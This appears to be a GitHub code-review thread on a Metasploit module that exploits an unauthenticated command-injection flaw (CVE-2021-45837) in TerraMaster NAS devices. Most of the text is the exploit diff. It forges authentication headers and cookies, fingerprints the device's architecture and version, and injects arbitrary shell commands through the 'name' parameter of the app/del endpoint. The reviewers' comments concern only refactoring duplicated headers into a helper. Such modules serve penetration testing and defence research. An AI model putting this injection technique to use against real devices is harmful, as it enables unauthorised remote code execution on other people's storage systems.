modules/exploits/linux/http/terramaster_unauth_rce_cve_2021_45837.rb

```diff
@@ -0,0 +1,289 @@
+        'ctype' => 'application/x-www-form-urlencoded',
+        'keep_cookies' => true,
+        'cookie' => "kod_name=#{admin}; kod_token=#{tos_encrypt_str(@data['key'], @data['password'])}",
+        'headers' => {
+          'User-Agent' => 'TNAS',
+          'User-Device' => 'TNAS',
+          'Authorization' => @data['password'],
+          'Signature' => @data['signature'],
+          'Timestamp' => @data['timestamp']
+        }
+      })
+      if res && res.code == 302 && !res.body.include?(marker.to_s)
+        # Send second request to establish a session and break from the loop if true.
+        res = send_request_cgi({
+          'method' => 'GET',
+          'uri' => normalize_uri(target_uri.path, 'tos', "index.php?app/del&id=0&name=;echo${IFS}#{marker};%23"),
+          'ctype' => 'application/x-www-form-urlencoded',
+          'keep_cookies' => true,
+          'headers' => {
+            'User-Agent' => 'TNAS',
+            'User-Device' => 'TNAS',
+            'Authorization' => @data['password'],
+            'Signature' => @data['signature'],
+            'Timestamp' => @data['timestamp']
+          }
+        })
+      end
+      next unless res && res.code == 200 && res.body.include?(marker.to_s)
+
+      session = true
+      break
+    end
+    return session
+  end
+
+  def get_terramaster_info
+    # get Terramaster CPU architecture (X64 or ARM64) and TOS version
+    @terramaster = {}
+    res = send_request_cgi({
+      'method' => 'GET',
+      'uri' => normalize_uri(target_uri.path, 'tos', 'index.php?user/login')
+    })
+
+    if res && res.body && res.code == 200
+      # get the version information from the request response like below:
+      # <link href="./static/style/bootstrap.css?ver=TOS3_A1.0_4.2.07" rel="stylesheet"/>
+      return if res.body.match(/ver=.+?"/).nil?
+
+      version = res.body.match(/ver=.+?"/)[0]
+      # check if architecture is ARM64 or X64
+      if version.match(/_A/)
+        @terramaster['cpu_arch'] = 'ARM64'
+      elsif version.match(/_S/) || version.match(/_Q/)
+        @terramaster['cpu_arch'] = 'X64'
+      else
+        @terramaster['cpu_arch'] = 'UNKNOWN'
+      end
+
+      # strip TOS version number and remove trailing double quote.
+      @terramaster['tos_version'] = version.split('.0_')[1].chop
+    end
+  end
+
+  def execute_command(cmd, _opts = {})
+    # Execute payload using vulnerable endpoint `index.php?app/del&id=0&name=;<PAYLOAD>;%23`
+    # CVE-2021-45837
+    payload = CGI.escape(cmd)
+    send_request_cgi({
+      'method' => 'GET',
+      'uri' => normalize_uri(target_uri.path, 'tos', "index.php?app/del&id=0&name=;#{payload};%23"),
+      'ctype' => 'application/x-www-form-urlencoded',
+      'keep_cookies' => true,
+      'headers' => {
+        'User-Agent' => 'TNAS',
+        'User-Device' => 'TNAS',
+        'Authorization' => @data['password'],
+        'Signature' => @data['signature'],
+        'Timestamp' => @data['timestamp']
```

Comment:
This headers section has been duplicated a few times could you extract out into it's own function?

Reply:
Hi @dwelch-r7, 
Can you explain a bit more? I am not entirely sure how to put headers in a function and call them from the send_cgi function.

Reply:
Maybe something like this?

```ruby
def get_headers
  {
     'User-Agent' => 'TNAS',
     'User-Device' => 'TNAS',
     'Authorization' => @data['password'],
     'Signature' => @data['signature'],
     'Timestamp' => @data['timestamp']
  }
end
```

And then for every request that uses these specific headers, just do this:

```ruby
send_request_cgi({
      'method' => 'GET',
      'uri' => normalize_uri(target_uri.path, 'tos', "index.php?app/del&id=0&name=;#{payload};%23"),
      'ctype' => 'application/x-www-form-urlencoded',
      'keep_cookies' => true,
      'headers' => get_headers
})
```

Reply:
Cool. Learned something new today ;-)

Reply:
See https://github.com/rapid7/metasploit-framework/pull/18070/commits/dfc366e022ffa438da15bc817b965268d092e6bb